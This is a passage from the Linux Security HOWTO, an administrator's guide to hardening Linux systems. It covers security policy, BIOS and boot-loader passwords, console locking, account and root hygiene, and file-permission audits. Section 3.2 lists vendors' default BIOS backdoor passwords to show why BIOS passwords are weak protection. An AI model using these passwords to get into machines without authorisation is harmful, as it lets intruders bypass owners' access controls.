Linux Security HOWTO
Kevin Fenzi
tummy.com, ltd.
<kevin-securityhowto@tummy.com>
Dave Wreski
linuxsecurity.com
<dave@linuxsecurity.com>
v2.3, 22 January 2004
This document is a general overview of security issues that face the
administrator of Linux systems. It covers general security philosophy and a
number of specific examples of how to better secure your Linux system from
intruders. Also included are pointers to security-related material and
programs. Improvements, constructive criticism, additions and corrections are
gratefully accepted. Please mail your feedback to both authors, with
"Security HOWTO" in the subject.
-----------------------------------------------------------------------------
Table of Contents
1. Introduction
1.1. New Versions of this Document
1.2. Feedback
1.3. Disclaimer
1.4. Copyright Information
2. Overview
2.1. Why Do We Need Security?
2.2. How Secure Is Secure?
2.3. What Are You Trying to Protect?
2.4. Developing A Security Policy
2.5. Means of Securing Your Site
2.6. Organization of This Document
3. Physical Security
3.1. Computer locks
3.2. BIOS Security
3.3. Boot Loader Security
3.4. xlock and vlock
3.5. Security of local devices
3.6. Detecting Physical Security Compromises
4. Local Security
4.1. Creating New Accounts
4.2. Root Security
5. Files and File system Security
5.1. Umask Settings
5.2. File Permissions
5.3. Integrity Checking
5.4. Trojan Horses
6. Password Security and Encryption
6.1. PGP and Public-Key Cryptography
6.2. SSL, S-HTTP and S/MIME
6.3. Linux IPSEC Implementations
6.4. ssh (Secure Shell) and stelnet
6.5. PAM - Pluggable Authentication Modules
6.6. Cryptographic IP Encapsulation (CIPE)
6.7. Kerberos
6.8. Shadow Passwords.
6.9. "Crack" and "John the Ripper"
6.10. CFS - Cryptographic File System and TCFS - Transparent
Cryptographic File System
6.11. X11, SVGA and display security
7. Kernel Security
7.1. 2.0 Kernel Compile Options
7.2. 2.2 Kernel Compile Options
7.3. Kernel Devices
8. Network Security
8.1. Packet Sniffers
8.2. System services and tcp_wrappers
8.3. Verify Your DNS Information
8.4. identd
8.5. Configuring and Securing the Postfix MTA
8.6. SATAN, ISS, and Other Network Scanners
8.7. sendmail, qmail and MTA's
8.8. Denial of Service Attacks
8.9. NFS (Network File System) Security.
8.10. NIS (Network Information Service) (formerly YP).
8.11. Firewalls
8.12. IP Chains - Linux Kernel 2.2.x Firewalling
8.13. Netfilter - Linux Kernel 2.4.x Firewalling
8.14. VPNs - Virtual Private Networks
9. Security Preparation (before you go on-line)
9.1. Make a Full Backup of Your Machine
9.2. Choosing a Good Backup Schedule
9.3. Testing your backups
9.4. Backup Your RPM or Debian File Database
9.5. Keep Track of Your System Accounting Data
9.6. Apply All New System Updates.
10. What To Do During and After a Breakin
10.1. Security Compromise Underway.
10.2. Security Compromise has already happened
11. Security Sources
11.1. LinuxSecurity.com References
11.2. FTP Sites
11.3. Web Sites
11.4. Mailing Lists
11.5. Books - Printed Reading Material
12. Glossary
13. Frequently Asked Questions
14. Conclusion
15. Acknowledgments
1. Introduction
This document covers some of the main issues that affect Linux security.
General philosophy and net-born resources are discussed.
A number of other HOWTO documents overlap with security issues, and those
documents have been pointed to wherever appropriate.
This document is not meant to be an up-to-date exploits document. Large
numbers of new exploits happen all the time. This document will tell you
where to look for such up-to-date information, and will give some general
methods to prevent such exploits from taking place.
-----------------------------------------------------------------------------
1.1. New Versions of this Document
New versions of this document will be periodically posted to
comp.os.linux.answers. They will also be added to the various sites that
archive such information, including:
[http://www.linuxdoc.org/] http://www.linuxdoc.org/
The very latest version of this document should also be available in various
formats from:
  * [http://scrye.com/~kevin/lsh/] http://scrye.com/~kevin/lsh/
  * [http://www.linuxsecurity.com/docs/Security-HOWTO]
    http://www.linuxsecurity.com/docs/Security-HOWTO
  * [http://www.tummy.com/security-howto]
    http://www.tummy.com/security-howto
-----------------------------------------------------------------------------
1.2. Feedback
All comments, error reports, additional information and criticism of all
sorts should be directed to:
[mailto:kevin-securityhowto@tummy.com] kevin-securityhowto@tummy.com
and
[mailto:dave@linuxsecurity.com] dave@linuxsecurity.com
Note: Please send your feedback to both authors. Also, be sure to include
"Linux", "security", or "HOWTO" in your subject to avoid Kevin's spam
filter.
-----------------------------------------------------------------------------
1.3. Disclaimer
No liability for the contents of this document can be accepted. Use the
concepts, examples and other content at your own risk. Additionally, this is
an early version, possibly with many inaccuracies or errors.
A number of the examples and descriptions use the RedHat(tm) package layout
and system setup. Your mileage may vary.
As far as we know, we describe only programs that may be used or evaluated
for personal purposes under certain terms. Most of the programs are
available, complete with source, under [http://www.gnu.org/copyleft/
gpl.html] GNU terms.
-----------------------------------------------------------------------------
1.4. Copyright Information
This document is copyrighted (c)1998-2000 Kevin Fenzi and Dave Wreski, and
distributed under the following terms:
  * Linux HOWTO documents may be reproduced and distributed in whole or in
    part, in any medium, physical or electronic, as long as this copyright
    notice is retained on all copies. Commercial redistribution is allowed
    and encouraged; however, the authors would like to be notified of any
    such distributions.
  * All translations, derivative works, or aggregate works incorporating
    any Linux HOWTO documents must be covered under this copyright notice.
    That is, you may not produce a derivative work from a HOWTO and impose
    additional restrictions on its distribution. Exceptions to these rules
    may be granted under certain conditions; please contact the Linux HOWTO
    coordinator at the address given below.
  * If you have questions, please contact Tim Bynum, the Linux HOWTO
    coordinator, at [mailto:tjbynum@metalab.unc.edu] tjbynum@metalab.unc.edu
-----------------------------------------------------------------------------
2. Overview
This document will attempt to explain some procedures and commonly-used
software to help your Linux system be more secure. It is important to discuss
some of the basic concepts first, and create a security foundation, before we
get started.
-----------------------------------------------------------------------------
2.1. Why Do We Need Security?
In the ever-changing world of global data communications, inexpensive
Internet connections, and fast-paced software development, security is
becoming more and more of an issue. Security is now a basic requirement
because global computing is inherently insecure. As your data goes from point
A to point B on the Internet, for example, it may pass through several other
points along the way, giving other users the opportunity to intercept, and
even alter, it. Even other users on your system may maliciously transform
your data into something you did not intend. Unauthorized access to your
system may be obtained by intruders, also known as "crackers", who then use
advanced knowledge to impersonate you, steal information from you, or even
deny you access to your own resources. If you're wondering what the
difference is between a "Hacker" and a "Cracker", see Eric Raymond's
document, "How to Become A Hacker", available at
[http://www.catb.org/~esr/faqs/hacker-howto.html]
http://www.catb.org/~esr/faqs/hacker-howto.html.
-----------------------------------------------------------------------------
2.2. How Secure Is Secure?
First, keep in mind that no computer system can ever be completely secure.
All you can do is make it increasingly difficult for someone to compromise
your system. For the average home Linux user, not much is required to keep
the casual cracker at bay. However, for high-profile Linux users (banks,
telecommunications companies, etc), much more work is required.
Another factor to take into account is that the more secure your system is,
the more intrusive your security becomes. You need to decide where in this
balancing act your system will still be usable, and yet secure for your
purposes. For instance, you could require everyone dialing into your system
to use a call-back modem to call them back at their home number. This is more
secure, but if someone is not at home, it makes it difficult for them to
login. You could also set up your Linux system with no network or connection
to the Internet, but this limits its usefulness.
If you are a medium to large-sized site, you should establish a security
policy stating how much security is required by your site and what auditing
is in place to check it. You can find a well-known security policy example at
[http://www.faqs.org/rfcs/rfc2196.html]
http://www.faqs.org/rfcs/rfc2196.html. It has been recently updated, and
contains a great framework for establishing a security policy for your
company.
-----------------------------------------------------------------------------
2.3. What Are You Trying to Protect?
Before you attempt to secure your system, you should determine what level of
threat you have to protect against, what risks you should or should not take,
and how vulnerable your system is as a result. You should analyze your system
to know what you're protecting, why you're protecting it, what value it has,
and who has responsibility for your data and other assets.
  * Risk is the possibility that an intruder may be successful in attempting
to access your computer. Can an intruder read or write files, or execute
programs that could cause damage? Can they delete critical data? Can they
prevent you or your company from getting important work done? Don't
forget: someone gaining access to your account, or your system, can also
impersonate you.
Additionally, having one insecure account on your system can result in
your entire network being compromised. If you allow a single user to
login using a .rhosts file, or to use an insecure service such as tftp,
you risk an intruder getting 'his foot in the door'. Once the intruder
has a user account on your system, or someone else's system, it can be
used to gain access to another system, or another account.
  * Threat is typically from someone with motivation to gain unauthorized
access to your network or computer. You must decide whom you trust to
have access to your system, and what threat they could pose.
There are several types of intruders, and it is useful to keep their
different characteristics in mind as you are securing your systems.
      + The Curious - This type of intruder is basically interested in
finding out what type of system and data you have.
      + The Malicious - This type of intruder is out to either bring down
your systems, or deface your web page, or otherwise force you to
spend time and money recovering from the damage he has caused.
      + The High-Profile Intruder - This type of intruder is trying to use
your system to gain popularity and infamy. He might use your
high-profile system to advertise his abilities.
      + The Competition - This type of intruder is interested in what data
you have on your system. It might be someone who thinks you have
something that could benefit him, financially or otherwise.
      + The Borrowers - This type of intruder is interested in setting up
shop on your system and using its resources for their own purposes.
He typically will run chat or irc servers, porn archive sites, or
even DNS servers.
      + The Leapfrogger - This type of intruder is only interested in your
system to use it to get into other systems. If your system is
well-connected or a gateway to a number of internal hosts, you may
well see this type trying to compromise your system.
  * Vulnerability describes how well-protected your computer is from another
network, and the potential for someone to gain unauthorized access.
What's at stake if someone breaks into your system? Of course the
concerns of a dynamic PPP home user will be different from those of a
company connecting their machine to the Internet, or another large
network.
How much time would it take to retrieve/recreate any data that was lost?
An initial time investment now can save ten times more time later if you
have to recreate data that was lost. Have you checked your backup
strategy, and verified your data lately?
-----------------------------------------------------------------------------
2.4. Developing A Security Policy
Create a simple, generic policy for your system that your users can readily
understand and follow. It should protect the data you're safeguarding as well
as the privacy of the users. Some things to consider adding are: who has
access to the system (Can my friend use my account?), who's allowed to
install software on the system, who owns what data, disaster recovery, and
appropriate use of the system.
A generally-accepted security policy starts with the phrase
"That which is not permitted is prohibited"
This means that unless you grant access to a service for a user, that user
shouldn't be using that service until you do grant access. Make sure the
policies work on your regular user account. Saying, "Ah, I can't figure out
this permissions problem, I'll just do it as root" can lead to security holes
that are very obvious, and even ones that haven't been exploited yet.
[ftp://www.faqs.org/rfcs/rfc1244.html] rfc1244 is a document that describes
how to create your own network security policy.
[ftp://www.faqs.org/rfcs/rfc1281.html] rfc1281 is a document that shows an
example security policy with detailed descriptions of each step.
Finally, you might want to look at the COAST policy archive at
[ftp://coast.cs.purdue.edu/pub/doc/policy]
ftp://coast.cs.purdue.edu/pub/doc/policy to see what some real-life security
policies look like.
-----------------------------------------------------------------------------
2.5. Means of Securing Your Site
This document will discuss various means with which you can secure the
assets you have worked hard for: your local machine, your data, your users,
your network, even your reputation. What would happen to your reputation if
an intruder deleted some of your users' data? Or defaced your web site? Or
published your company's corporate project plan for next quarter? If you are
planning a network installation, there are many factors you must take into
account before adding a single machine to your network.
Even if you have a single dial up PPP account, or just a small site, this
does not mean intruders won't be interested in your systems. Large,
high-profile sites are not the only targets -- many intruders simply want to
exploit as many sites as possible, regardless of their size. Additionally,
they may use a security hole in your site to gain access to other sites
you're connected to.
Intruders have a lot of time on their hands, and can avoid guessing how
you've obscured your system just by trying all the possibilities. There are
also a number of reasons an intruder may be interested in your systems, which
we will discuss later.
-----------------------------------------------------------------------------
2.5.1. Host Security
Perhaps the area of security on which administrators concentrate most is
host-based security. This typically involves making sure your own system is
secure, and hoping everyone else on your network does the same. Choosing good
passwords, securing your host's local network services, keeping good
accounting records, and upgrading programs with known security exploits are
among the things the local security administrator is responsible for doing.
Although this is absolutely necessary, it can become a daunting task once
your network becomes larger than a few machines.
-----------------------------------------------------------------------------
2.5.2. Local Network Security
Network security is as necessary as local host security. With hundreds,
thousands, or more computers on the same network, you can't rely on each one
of those systems being secure. Ensuring that only authorized users can use
your network, building firewalls, using strong encryption, and ensuring there
are no "rogue" (that is, unsecured) machines on your network are all part of
the network security administrator's duties.
This document will discuss some of the techniques used to secure your site,
and hopefully show you some of the ways to prevent an intruder from gaining
access to what you are trying to protect.
-----------------------------------------------------------------------------
2.5.3. Security Through Obscurity
One type of security that must be discussed is "security through obscurity".
This means, for example, moving a service that has known security
vulnerabilities to a non-standard port in hopes that attackers won't notice
it's there and thus won't exploit it. Rest assured that they can determine
that it's there and will exploit it. Security through obscurity is no
security at all. Simply because you may have a small site, or a relatively
low profile, does not mean an intruder won't be interested in what you have.
We'll discuss what you're protecting in the next sections.
-----------------------------------------------------------------------------
2.6. Organization of This Document
This document has been divided into a number of sections. They cover several
broad security issues. The first, Section 3, covers how you need to protect
your physical machine from tampering. The second, Section 4, describes how to
protect your system from tampering by local users. The third, Section 5,
shows you how to set up your file systems and permissions on your files. The
next, Section 6, discusses how to use encryption to better secure your
machine and network. Section 7 discusses what kernel options you should set
or be aware of for a more secure system. Section 8 describes how to better
secure your Linux system from network attacks. Section 9 discusses how to
prepare your machine(s) before bringing them on-line. Next, Section 10
discusses what to do when you detect a system compromise in progress or
detect one that has recently happened. In Section 11, some primary security
resources are enumerated. The Q and A section, Section 13, answers some
frequently-asked questions, and Section 14 concludes the document.
The two main points to realize when reading this document are:
  * Be aware of your system. Check system logs such as /var/log/messages and
    keep an eye on your system, and
  * Keep your system up-to-date by making sure you have installed the
    current versions of software and have upgraded per security alerts. Just
    doing this will help make your system markedly more secure.
-----------------------------------------------------------------------------
3. Physical Security
The first layer of security you need to take into account is the physical
security of your computer systems. Who has direct physical access to your
machine? Should they? Can you protect your machine from their tampering?
Should you?
How much physical security you need on your system is very dependent on your
situation, and/or budget.
If you are a home user, you probably don't need a lot (although you might
need to protect your machine from tampering by children or annoying
relatives). If you are in a lab, you need considerably more, but users will
still need to be able to get work done on the machines. Many of the following
sections will help out. If you are in an office, you may or may not need to
secure your machine off-hours or while you are away. At some companies,
leaving your console unsecured is a termination offense.
Obvious physical security methods such as locks on doors, cables, locked
cabinets, and video surveillance are all good ideas, but beyond the scope of
this document. :)
-----------------------------------------------------------------------------
3.1. Computer locks
Many modern PC cases include a "locking" feature. Usually this will be a
socket on the front of the case that allows you to turn an included key to a
locked or unlocked position. Case locks can help prevent someone from
stealing your PC, or opening up the case and directly manipulating/stealing
your hardware. They can also sometimes prevent someone from rebooting your
computer from their own floppy or other hardware.
These case locks do different things according to the support in the
motherboard and how the case is constructed. On many PCs they make it so you
have to break the case to get the case open. On some others, they will not
let you plug in new keyboards or mice. Check your motherboard or case
instructions for more information. This can sometimes be a very useful
feature, even though the locks are usually very low-quality and can easily
be defeated by attackers with basic locksmithing skills.
Some machines (most notably SPARCs and Macs) have a dongle on the back
through which you can run a cable; attackers would then have to cut the
cable or break the case to get into the machine. Just putting a padlock or
combination lock through these can be a good deterrent to someone stealing
your machine.
-----------------------------------------------------------------------------
3.2. BIOS Security
The BIOS is the lowest level of software that configures or manipulates your
x86-based hardware. LILO and other Linux boot methods access the BIOS to
determine how to boot up your Linux machine. Other hardware that Linux runs
on has similar software (Open Firmware on Macs and new Suns, Sun boot PROM,
etc...). You can use your BIOS to prevent attackers from rebooting your
machine and manipulating your Linux system.
Many PC BIOSs let you set a boot password. This doesn't provide all that
much security (the BIOS can be reset, or removed if someone can get into the
case), but might be a good deterrent (i.e. it will take time and leave traces
of tampering). Similarly, on S/Linux (Linux for SPARC(tm) processor
machines), your EEPROM can be set to require a boot-up password. This might
slow attackers down.
Another risk of trusting BIOS passwords to secure your system is the default
password problem. Most BIOS makers don't expect people to open up their
computer and disconnect batteries if they forget their password, and so have
equipped their BIOSes with default passwords that work regardless of your
chosen password. Some of the more common passwords include:
j262 AWARD_SW AWARD_PW lkwpeter Biostar AMI Award bios BIOS setup cmos AMI!
SW1 AMI?SW1 password hewittrand shift + s y x z
I tested an Award BIOS and AWARD_PW worked. These passwords are quite easily
available from manufacturers' websites and [http://astalavista.box.sk]
http://astalavista.box.sk, and as such a BIOS password cannot be considered
adequate protection from a knowledgeable attacker.
Many x86 BIOSs also allow you to specify various other good security
settings. Check your BIOS manual or look at it the next time you boot up. For
example, some BIOSs disallow booting from floppy drives and some require
passwords to access some BIOS features.
Note: If you have a server machine, and you set up a boot password, your
machine will not boot up unattended. Keep in mind that you will need to come
in and supply the password in the event of a power failure. ;(
-----------------------------------------------------------------------------
3.3. Boot Loader Security
The various Linux boot loaders also can have a boot password set. LILO, for
example, has password and restricted settings; password requires a password
at boot time, whereas restricted requires a boot-time password only if you
specify options (such as single) at the LILO prompt.
From the lilo.conf man page:
password=password
The per-image option `password=...' (see below) applies to all images.
restricted
The per-image option `restricted' (see below) applies to all images.
password=password
Protect the image by a password.
restricted
A password is only required to boot the image if
parameters are specified on the command line
(e.g. single).
Keep in mind when setting all these passwords that you need to remember
them. :) Also remember that these passwords will merely slow the determined
attacker. They won't prevent someone from booting from a floppy, and mounting
your root partition. If you are using security in conjunction with a boot
loader, you might as well disable booting from a floppy in your computer's
BIOS, and password-protect the BIOS.
Also keep in mind that /etc/lilo.conf will need to be mode "600" (readable
and writable by root only), or others will be able to read your passwords!
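Tightening those permissions is a one-liner. The sketch below uses a scratch
file standing in for /etc/lilo.conf so it can be run safely; on a real
system the target is /etc/lilo.conf itself (and you must be root):

```shell
# Demonstrate mode 600 on a scratch file standing in for /etc/lilo.conf.
f=$(mktemp)
echo 'password=not-a-real-password' > "$f"
chmod 600 "$f"
mode=$(stat -c '%a' "$f")   # GNU stat; prints the octal mode
echo "mode: $mode"
rm -f "$f"
```

The equivalent on the real file is simply chmod 600 /etc/lilo.conf.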
From the GRUB info page: GRUB provides a "password" feature, so that only
administrators can start the interactive operations (i.e. editing menu
entries and entering the command-line interface). To use this feature, you
need to run the command `password' in your configuration file (*note
password::), like this:
password --md5 PASSWORD
If this is specified, GRUB disallows any interactive control, until you
press the key <p> and enter a correct password. The option `--md5' tells GRUB
that `PASSWORD' is in MD5 format. If it is omitted, GRUB assumes the
`PASSWORD' is in clear text.
You can encrypt your password with the command `md5crypt' (*note
md5crypt::). For example, run the grub shell (*note Invoking the grub
shell::), and enter your password:
grub> md5crypt
Password: **********
Encrypted: $1$U$JK7xFegdxWH6VuppCUSIb.
Then, cut and paste the encrypted password to your configuration file.
GRUB also has a 'lock' command that prevents a menu entry from being booted
without the correct password. Simply add 'lock' to the entry and it will not
be accessible until the user supplies the password.
If anyone has security-related information from a different boot loader, we
would love to hear it. (grub, silo, milo, linload, etc).
Note: If you have a server machine, and you set up a boot password, your
machine will not boot up unattended. Keep in mind that you will need to come
in and supply the password in the event of a power failure. ;(
-----------------------------------------------------------------------------
3.4. xlock and vlock
If you wander away from your machine from time to time, it is nice to be
able to "lock" your console so that no one can tamper with, or look at, your
work. Two programs that do this are: xlock and vlock.
xlock is an X display locker. It should be included in any Linux
distribution that supports X. Check out its man page for more options, but
in general you can run xlock from any xterm on your console and it will lock
the display and require your password to unlock it.
vlock is a simple little program that allows you to lock some or all of the
virtual consoles on your Linux box. You can lock just the one you are working
in or all of them. If you just lock one, others can come in and use the
console; they will just not be able to use your virtual console until you
unlock it. vlock ships with RedHat Linux, but your mileage may vary.
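Typical invocations look like this. Both commands are interactive and will
prompt for your password to unlock; the -a flag for locking all consoles is
from the vlock shipped with RedHat and may differ in other packagings:

```
# Lock the current X display until your password is entered:
xlock

# Lock only the virtual console you are working in:
vlock

# Lock all virtual consoles at once:
vlock -a
```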
Of course locking your console will prevent someone from tampering with your
work, but won't prevent them from rebooting your machine or otherwise
disrupting your work. It also does not prevent them from accessing your
machine from another machine on the network and causing problems.
More importantly, it does not prevent someone from switching out of the X
Window System entirely, and going to a normal virtual console login prompt,
or to the VC that X11 was started from, and suspending it, thus obtaining
your privileges. For this reason, you might consider only using it while
under control of xdm.
-----------------------------------------------------------------------------
3.5. Security of local devices
If you have a webcam or a microphone attached to your system, you should
consider whether there is some danger of an attacker gaining access to those
devices. When not in use, unplugging or removing such devices might be an
option. Otherwise you should carefully read and audit any software that
provides access to such devices.
-----------------------------------------------------------------------------
3.6. Detecting Physical Security Compromises
The first thing to always note is when your machine was rebooted. Since
Linux is a robust and stable OS, the only times your machine should reboot
are when you take it down for OS upgrades, hardware swapping, or the like. If
your machine has rebooted without you doing it, that may be a sign that an
intruder has compromised it. Many of the ways that your machine can be
compromised require the intruder to reboot or power off your machine.
Check for signs of tampering on the case and computer area. Although many
intruders clean traces of their presence out of logs, it's a good idea to
check through them all and note any discrepancy.
It is also a good idea to store log data at a secure location, such as a
dedicated log server within your well-protected network. Once a machine has
been compromised, log data becomes of little use as it most likely has also
been modified by the intruder.
The syslog daemon can be configured to automatically send log data to a
central syslog server, but this is typically sent unencrypted, allowing an
intruder to view data as it is being transferred. This may reveal information
about your network that is not intended to be public. There are syslog
daemons available that encrypt the data as it is being sent.
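A minimal sketch of such forwarding with the stock syslog daemon: a single
line in /etc/syslog.conf sends a copy of every message to a central host.
"loghost" here is a placeholder for your own log server's name, and remember
that this traffic travels unencrypted:

```
# /etc/syslog.conf -- forward all messages to a central log host
*.*    @loghost
```

Restart the syslog daemon after editing the file for the change to take
effect.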
Also be aware that faking syslog messages is easy; an exploit program doing
so has been published. Syslog even accepts network log entries claiming to
come from the local host without indicating their true origin.
Some things to check for in your logs:
  * Short or incomplete logs.
  * Logs containing strange timestamps.
  * Logs with incorrect permissions or ownership.
  * Records of reboots or restarting of services.
  * Missing logs.
  * su entries or logins from strange places.
We will discuss system log data in Section 9.5 of this HOWTO.
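One of those checks, logs with incorrect permissions, is easy to automate
with find. The sketch below runs against a scratch directory so it is safe
to try; on a real system you would point it at /var/log:

```shell
# Flag world-writable files, one sign of tampered logs.
# Uses a scratch directory for safety; run against /var/log for real.
d=$(mktemp -d)
touch "$d/messages"
chmod 666 "$d/messages"            # deliberately bad permissions
bad=$(find "$d" -type f -perm -002)  # files writable by "other"
echo "world-writable: $bad"
rm -rf "$d"
```

On a healthy system, find /var/log -type f -perm -002 should print nothing.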
-----------------------------------------------------------------------------
4. Local Security
The next thing to take a look at is the security of your system against
attacks from local users. Did we just say local users? Yes!
Getting access to a local user account is one of the first things that
system intruders attempt while on their way to exploiting the root account.
With lax local security, they can then "upgrade" their normal user access to
root access using a variety of bugs and poorly setup local services. If you
make sure your local security is tight, then the intruder will have another
hurdle to jump.
Local users can also cause a lot of havoc with your system even (especially)
if they really are who they say they are. Providing accounts to people you
don't know or for whom you have no contact information is a very bad idea.
-----------------------------------------------------------------------------
4.1. Creating New Accounts
You should make sure you provide user accounts with only the minimal
requirements for the task they need to do. If you provide your son (age 10)
with an account, you might want him to only have access to a word processor
or drawing program, but be unable to delete data that is not his.
Several good rules of thumb when allowing other people legitimate access to
your Linux machine:
  * Give them the minimal amount of privileges they need.
  * Be aware when/where they login from, or should be logging in from.
  * Make sure you remove inactive accounts, which you can determine by using
    the 'last' command and/or checking log files for any activity by the
    user.
  * The use of the same userid on all computers and networks is advisable to
    ease account maintenance, and it permits easier analysis of log data.
  * The creation of group user-ids should be absolutely prohibited. User
    accounts provide accountability, and this is not possible with group
    accounts.
Many local user accounts that are used in security compromises have not been
used in months or years. Since no one is using them, they provide the ideal
attack vehicle.
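The inactive-account check above can be partly scripted. A sketch using the
standard lastlog utility; the "**Never logged in**" text is its usual output
format, but verify what your version prints before relying on it:

```shell
# Print account names that have never logged in; review these as removal
# candidates (system accounts like "bin" will appear here too).
lastlog | grep 'Never logged in' | awk '{print $1}'
```

Cross-check the result against `last` output and your own records before
deleting anything.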
-----------------------------------------------------------------------------
4.2. Root Security
The most sought-after account on your machine is the root (superuser)
account. This account has authority over the entire machine, which may also
include authority over other machines on the network. Remember that you
should only use the root account for very short, specific tasks, and should
mostly run as a normal user. Even small mistakes made while logged in as the
root user can cause problems. The less time you are on with root privileges,
the safer you will be.
Several tricks to avoid messing up your own box as root:
  * When doing some complex command, try running it first in a
    non-destructive way, especially commands that use globbing: e.g., if you
    want to do rm foo*.bak, first do ls foo*.bak and make sure you are going
    to delete the files you think you are. Using echo in place of destructive
    commands also sometimes works.
  * Provide your users with a default alias to the rm command to ask for
    confirmation for deletion of files.
  * Only become root to do single specific tasks. If you find yourself
    trying to figure out how to do something, go back to a normal user shell
    until you are sure what needs to be done by root.
  * The command path for the root user is very important. The command path
    (that is, the PATH environment variable) specifies the directories in
    which the shell searches for programs. Try to limit the command path for
    the root user as much as possible, and never include . (which means "the
    current directory") in your PATH. Additionally, never have writable
    directories in your search path, as this can allow attackers to modify or
    place new binaries in your search path, allowing them to run as root the
    next time you run that command.
  * Never use the rlogin/rsh/rexec suite of tools (called the r-utilities)
    as root. They are subject to many sorts of attacks, and are downright
    dangerous when run as root. Never create a .rhosts file for root.
  * The /etc/securetty file contains a list of terminals that root can login
    from. By default (on Red Hat Linux) this is set to only the local virtual
    consoles (vtys). Be very wary of adding anything else to this file. You
    should be able to login remotely as your regular user account and then su
    if you need to (hopefully over ssh (Section 6.4) or another encrypted
    channel), so there is no need to be able to login directly as root.
  * Always be slow and deliberate running as root. Your actions could affect
    a lot of things. Think before you type!
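The glob-preview advice in the first item above can be practiced safely.
This sketch uses a scratch directory and made-up file names:

```shell
# Preview a destructive glob before running it for real.
cd "$(mktemp -d)"              # scratch directory; nothing real at risk
touch foo1.bak foo2.bak keep.txt
ls foo*.bak                    # step 1: see exactly what the glob matches
echo rm foo*.bak               # step 2: echo prints the expanded command
rm foo*.bak                    # step 3: delete only after the preview looks right
ls                             # only keep.txt remains
```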
If you absolutely positively need to allow someone (hopefully very trusted)
to have root access to your machine, there are a few tools that can help.
sudo allows users to use their password to access a limited set of commands
as root. This would allow you to, for instance, let a user be able to eject
and mount removable media on your Linux box, but have no other root
privileges. sudo also keeps a log of all successful and unsuccessful sudo
attempts, allowing you to track down who used what command to do what. For
this reason sudo works well even in places where a number of people have root
access, because it helps you keep track of changes made.
Although sudo can be used to give specific users specific privileges for
specific tasks, it does have several shortcomings. It should be used only for
a limited set of tasks, like restarting a server, or adding new users. Any
program that offers a shell escape will give root access to a user invoking
it via sudo. This includes most editors, for example. Also, a program as
innocuous as /bin/cat can be used to overwrite files, which could allow root
to be exploited. Consider sudo as a means for accountability, and don't
expect it to replace the root user and still be secure.
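The removable-media example above might look roughly like this in
/etc/sudoers. The user name "joe" and the device paths are made up for
illustration, and the file should always be edited with visudo:

```
# Hypothetical /etc/sudoers fragment: user "joe" may mount, unmount, and
# eject removable media as root, and run nothing else via sudo.
joe   ALL = /bin/mount /mnt/cdrom, /bin/umount /mnt/cdrom, /usr/bin/eject
```

Note that the commands listed here take no shell escapes, which is exactly
the property the paragraph above asks for.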
-----------------------------------------------------------------------------
5. Files and File system Security
A few minutes of preparation and planning ahead before putting your systems
on-line can help to protect them and the data stored on them.
  * There should never be a reason for users' home directories to allow SUID
    /SGID programs to be run from there. Use the nosuid option in /etc/fstab
    for partitions that are writable by others than root. You may also wish
    to use nodev and noexec on users' home partitions, as well as /var, thus
    prohibiting execution of programs, and creation of character or block
    devices, which should never be necessary anyway.
  * If you are exporting file-systems using NFS, be sure to configure
    /etc/exports with the most restrictive access possible. This means not
    using wild cards, not allowing root write access, and exporting read-only
    wherever possible.
  * Configure your users' file-creation umask to be as restrictive as
    possible. See Section 5.1.
  * If you are mounting file systems using a network file system such as
    NFS, be sure to mount them with suitable restrictions. Typically, using
    `nodev', `nosuid', and perhaps `noexec', is desirable.
  * Set file system limits instead of allowing unlimited usage, which is the
    default. You can control the per-user limits using the resource-limits
    PAM module (pam_limits) and /etc/security/limits.conf. For example,
    limits for group users might look like this:
@users hard core 0
@users hard nproc 50
@users hard rss 5000
This says to prohibit the creation of core files, restrict the number of
processes to 50, and restrict memory usage per user to 5M.
You can also use the /etc/login.defs configuration file to set the same
limits.
  * The /var/log/wtmp and /var/run/utmp files contain the login records for
    all users on your system. Their integrity must be maintained because they
    can be used to determine when and from where a user (or potential
    intruder) has entered your system. These files should also have 644
    permissions, without affecting normal system operation.
  * The immutable bit can be used to prevent accidentally deleting or
    overwriting a file that must be protected. It also prevents someone from
    creating a hard link to the file. See the chattr(1) man page for
    information on the immutable bit.
  * SUID and SGID files on your system are a potential security risk, and
    should be monitored closely. Because these programs grant special
    privileges to the user who is executing them, it is necessary to ensure
    that insecure programs are not installed. A favorite trick of crackers is
    to exploit SUID-root programs, then leave a SUID program as a back door
    to get in the next time, even if the original hole is plugged.
Find all SUID/SGID programs on your system, and keep track of what they
are, so you are aware of any changes which could indicate a potential
intruder. Use the following command to find all SUID/SGID programs on
your system:
root# find / -type f \( -perm -04000 -o -perm -02000 \)
The Debian distribution runs a job each night to determine what SUID
files exist. It then compares this to the previous night's run. You can
look in /var/log/setuid* for this log.
You can remove the SUID or SGID permissions on a suspicious program with
chmod, then restore them back if you absolutely feel it is necessary.
  * World-writable files, particularly system files, can be a security hole
    if a cracker gains access to your system and modifies them. Additionally,
    world-writable directories are dangerous, since they allow a cracker to
    add or delete files as he wishes. To locate all world-writable files on
    your system, use the following command:
    root# find / -perm -2 ! -type l -ls
    and be sure you know why those files are writable. In the normal course
    of operation, several files will be world-writable, including some from
    /dev, and symbolic links, thus the ! -type l which excludes these from
    the previous find command.
  * Unowned files may also be an indication that an intruder has accessed
    your system. You can locate files on your system that have no owner, or
    belong to no group, with the command:
root# find / \( -nouser -o -nogroup \) -print
  * Finding .rhosts files should be a part of your regular system
    administration duties, as these files should not be permitted on your
    system. Remember, a cracker only needs one insecure account to
    potentially gain access to your entire network. You can locate all
    .rhosts files on your system with the following command:
    root# find /home -name .rhosts -print
  * Finally, before changing permissions on any system files, make sure you
    understand what you are doing. Never change permissions on a file because
    it seems like the easy way to get things working. Always determine why
    the file has that permission before changing it.
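The nosuid/nodev/noexec advice in the first items above might look like this
in /etc/fstab. The device names and partition layout here are assumptions
for illustration; adapt them to your own disks:

```
# Hypothetical /etc/fstab lines: no SUID/SGID binaries or device files on
# user-writable partitions, and no program execution from /var.
/dev/hda5   /home   ext2   defaults,nosuid,nodev          0 2
/dev/hda6   /var    ext2   defaults,nosuid,nodev,noexec   0 2
```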
-----------------------------------------------------------------------------
5.1. Umask Settings
The umask command can be used to set the default file creation mode on
your system. It is the octal complement of the desired file mode. If files
are created without any regard to their permissions settings, the user could
inadvertently give read or write permission to someone who should not have
this permission. Typical umask settings include 022, 027, and 077 (which is
the most restrictive). Normally the umask is set in /etc/profile, so it
applies to all users on the system. The resulting permission is calculated as
follows: The default permission of user/group/others (7 for directories, 6
for files) is combined with the inverted mask (NOT) using AND on a
per-bit-basis.
Example 1: file, default 6, binary: 110; mask, e.g. 2: 010, NOT: 101
           resulting permission, AND: 100 (equals 4, r__)
